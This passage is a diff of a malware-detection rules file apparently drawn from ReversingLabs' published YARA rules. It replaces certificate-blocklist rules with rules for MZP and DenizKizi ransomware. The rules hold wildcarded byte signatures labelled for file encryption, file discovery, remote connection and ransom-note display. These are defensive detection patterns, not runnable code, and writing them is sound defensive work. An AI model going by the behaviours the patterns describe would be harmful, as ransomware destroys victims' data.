+            ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 4C 24 ?? 8B 50 ??
+            89 0C 24 FF D2 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ??
+            89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24
+            ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 89
+            1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B
+            44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 54 24 ??
+            89 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24
+            ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ??
+            8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ??
+            89 2C 24 FF D3 8B 05 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44
+            24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89
+            4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 C4 ?? C3 E8
+        }
+		$encrypt_files_rsa = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24
+            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B
+            44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 50 ?? 8B 40 ?? 89 0C 24 89 54 24 ?? 89
+            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 75 ??
+            8D 15 ?? ?? ?? ?? 39 D0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 04
+            24 89 54 24 ?? 89 4C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24
+            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C
+            24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 83 C4 ?? C3 C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C
+            24 ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C7 40 ?? ??
+            ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8D 0D ?? ?? ?? ?? 89 08 C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? 89
+            44 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 04 24 8D 0D ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ?? ??
+            ?? 8B 44 24 ?? EB ?? 89 04 24 89 54 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ??
+            ?? 0F 0B
+        }
+		$find_files = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ??
+            ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44
+            24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ??
+            ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ??
+            ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 90 E8 ?? ?? ?? ?? 83
+            C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 E8
+        }
+		$remote_connection_p1 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24
+            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D
+            05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ??
+            8D 0D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C6 40 ?? ?? 8B 0D ?? ?? ?? ??
+            8B 54 24 ?? 8D 5A ?? 85 C9 0F 85 ?? ?? ?? ?? 89 42 ?? 8D 05 ?? ?? ?? ?? 89 04 24 E8
+            ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8D 0D
+            ?? ?? ?? ?? 89 08 8B 0D ?? ?? ?? ?? 8D 50 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 89
+            48 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B
+            44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44
+            24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ??
+            8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ??
+            ?? 8B 4C 24 ?? 89 08 C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40
+        }
+		$remote_connection_p2 = {
+            C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 4C 24
+            ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 4C
+            24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 05 ?? ?? ??
+            ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C
+            24 ?? 8B 54 24 ?? 89 0C 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24
+            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 0C
+            24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3
+            8B 48 ?? 84 01 8B 40 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 41 ?? 89 44 24 ?? E8 ??
+            ?? ?? ?? 85 C0 75 ?? EB ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8B 4C 24 ?? 89 4C
+            24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? E9 ?? ?? ?? ?? 89 14 24 8B 44 24 ?? 89 44 24 ?? E8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 90 E8
+            ?? ?? ?? ?? 83 C4 ?? C3 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Red GmbH" and ( pe.signatures [ i ] . serial == "00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures [ i ] . serial == "b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" ) and 1581936420 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( all of ( $remote_connection_p* ) ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_08653Ef2Ed9E6Ebb56Ffa7E93F963235 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_MZP : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MZP ransomware."
 		author = "ReversingLabs"
-		id = "9ac976c0-260f-5207-ae39-bbb722c38a92"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c08a4080-fa26-5b7b-869d-5f59096b1a12"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3828-L3844"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.MZP.yara#L1-L147"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5ae8d2fb03cd0f945c2f5eb86de4e5da4fbb1cdf233d8a808157304538ced872"
+		logic_hash = "724ae1033bfb8ff494b30e6b3333e6c848375f1b001b75e71c9444c9f9f31251"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "MZP"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$show_ransom_note_p1 = {
+            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 53 56 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ??
+            ?? 88 55 ?? 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C3 E8 ?? ?? ??
+            ?? 89 1D ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 33 C0
+            89 46 ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ??
+            6A ?? 6A ?? 8D 45 ?? 50 33 C9 B2 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8D 86 ??
+            ?? ?? ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ??
+            C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ??
+            ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ??
+            ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ??
+            ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8
+            ?? ?? ?? ?? B2 ?? 8B C6 E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 8B 00 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 33 D2 8B C6 E8
+        }
+		$show_ransom_note_p2 = {
+            C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ??
+            ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ??
+            ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? B2
+            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C6 46 ?? ?? C6 46 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? C6 46
+            ?? ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            F0 89 73 ?? BA ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0
+            8D 46 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8B C6 C6
+            40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73
+            ?? 8B C6 C6 40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 43 ?? 8B 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 46 ?? 33 D2 E8 ?? ?? ??
+            ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? 8D 46 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 43 ?? B2 ?? A1 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 89 43 ?? 8B 73 ?? 8D 46 ?? 33 D2 E8 ?? ?? ?? ?? 8D 46 ?? BA ?? ?? ??
+            ?? E8
+        }
+		$search_config_file = {
+            8B C0 53 56 8B F0 8A 9E ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 75 ??
+            8B 46 ?? 8B 48 ?? A1 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 D2 8B
+            86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 83 BE ?? ?? ?? ?? ?? 74 ?? 8B 96 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ??
+            EB ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 88 9E ?? ?? ?? ?? 8A 96 ?? ??
+            ?? ?? 8B C6 E8 ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 74 ?? 8B 46 ?? 8B 8E ?? ?? ?? ?? 8B
+            96 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8B 46 ?? E8 ?? ?? ?? ?? 8B 46 ?? 89
+            70 ?? 5E 5B C3
+        }
+		$track_mouse_event_for_entropy = {
+            53 56 83 C4 ?? 8B F0 8B 42 ?? 05 ?? ?? ?? ?? 83 E8 ?? 72 ?? 2D ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 8A 86 ?? ?? ?? ?? 88 44 24 ?? 66 83 BE ?? ?? ?? ?? ?? 74 ??
+            8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 8B D8 EB ?? 54 E8 ?? ?? ?? ?? 8D 4C 24 ??
+            8B D4 8B C6 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8D 54 24 ??
+            8B C6 E8 ?? ?? ?? ?? 8D 54 24 ?? 8B C4 E8 ?? ?? ?? ?? 8B D8 3A 5C 24 ?? 0F 84 ?? ??
+            ?? ?? 8B C6 E8 ?? ?? ?? ?? 84 DB 74 ?? C6 86 ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ??
+            74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 8B 46 ?? 89 44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB
+            ?? C6 86 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 46 ?? 89
+            44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ??
+            ?? ?? FF 96 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB ?? 80 BE ?? ?? ?? ?? ?? 74 ?? C6 86
+            ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ??
+            ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 5E 5B C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B FA
+            8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? 8D 85 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 8A 08 41 E8
+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ??
+            ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? E9 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 53 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? FF 43
+        }
+		$find_files_p2 = {
+            80 7B ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? EB ?? 80 7B ?? ?? 74 ?? 8D
+            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 43 ?? E8 ?? ?? ?? ?? EB ??
+            8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            8D 43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files = {
+            8B C0 33 D2 89 50 ?? 89 50 ?? 52 8D 50 ?? 52 FF 70 ?? FF 70 ?? FF 30 E8 ?? ?? ?? ??
+            85 C0 74 ?? 33 C0 C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? C3 33 C0 C3 51 8B 50 ?? 85 D2 7E
+            ?? 33 C9 89 48 ?? 51 8D 4C 24 ?? 51 52 FF 70 ?? FF 30 E8 ?? ?? ?? ?? 85 C0 74 ?? 33
+            C0 59 C3 E8 ?? ?? ?? ?? EB ?? FF 30 C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 75 ?? C3
+            E8 ?? ?? ?? ?? C3 56 8B F0 33 C0 89 46 ?? 89 46 ?? 8B 46 ?? 2D ?? ?? ?? ?? 74 ?? 48
+            74 ?? 48 74 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ??
+            ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ??
+            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ??
+            ?? ?? ?? 80 7E ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 52 50 8D 46 ??
+            50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 06 81 7E ?? ?? ?? ?? ?? 0F 85 ?? ??
+            ?? ?? FF 4E ?? 6A ?? FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 2D ?? ?? ?? ?? 73 ??
+            33 C0 6A ?? 6A ?? 50 FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 6A ?? 8B D4 6A ?? 52
+            68 ?? ?? ?? ?? 8D 96 ?? ?? ?? ?? 52 FF 36 E8 ?? ?? ?? ?? 5A 48 0F 85 ?? ?? ?? ?? 33
+            C0 3B C2 73 ?? 80 BC 06 ?? ?? ?? ?? ?? 74 ?? 40 EB ?? 6A ?? 6A ?? 2B C2 50 FF 36 E8
+            ?? ?? ?? ?? 40 74 ?? FF 36 E8 ?? ?? ?? ?? 48 75 ?? EB ?? C7 46 ?? ?? ?? ?? ?? 81 7E
+            ?? ?? ?? ?? ?? 74 ?? 6A ?? EB ?? 6A ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 06 81 7E ??
+            ?? ?? ?? ?? 74 ?? FF 36 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 F8 ?? 75 ?? C7 46 ?? ?? ?? ??
+            ?? 33 C0 5E C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haw Farm LIMITED" and pe.signatures [ i ] . serial == "08:65:3e:f2:ed:9e:6e:bb:56:ff:a7:e9:3f:96:32:35" and 1581465601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_config_file ) and ( all of ( $find_files_p* ) ) and ( $track_mouse_event_for_entropy ) and ( $encrypt_files ) and ( all of ( $show_ransom_note_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_9C4816D900A6Ecdbe54Adf72B19Ebcf5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Denizkizi : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DenizKizi ransomware."
 		author = "ReversingLabs"
-		id = "bd22372d-774b-5e25-b4e5-47d34fe1c40b"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "e16a00d6-d5b8-5702-9cd7-d037b0ff46a3"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3846-L3864"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DenizKizi.yara#L1-L88"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "92e8130f444417d5bc3788721280338bbed33e3362104de0cf27bc7c1fc30d0e"
+		logic_hash = "fbeb01263d6f68141e094ba8fb1c1a54c601ab24292f5c6b0eb8cb0c49f46afc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DenizKizi"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
+            8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
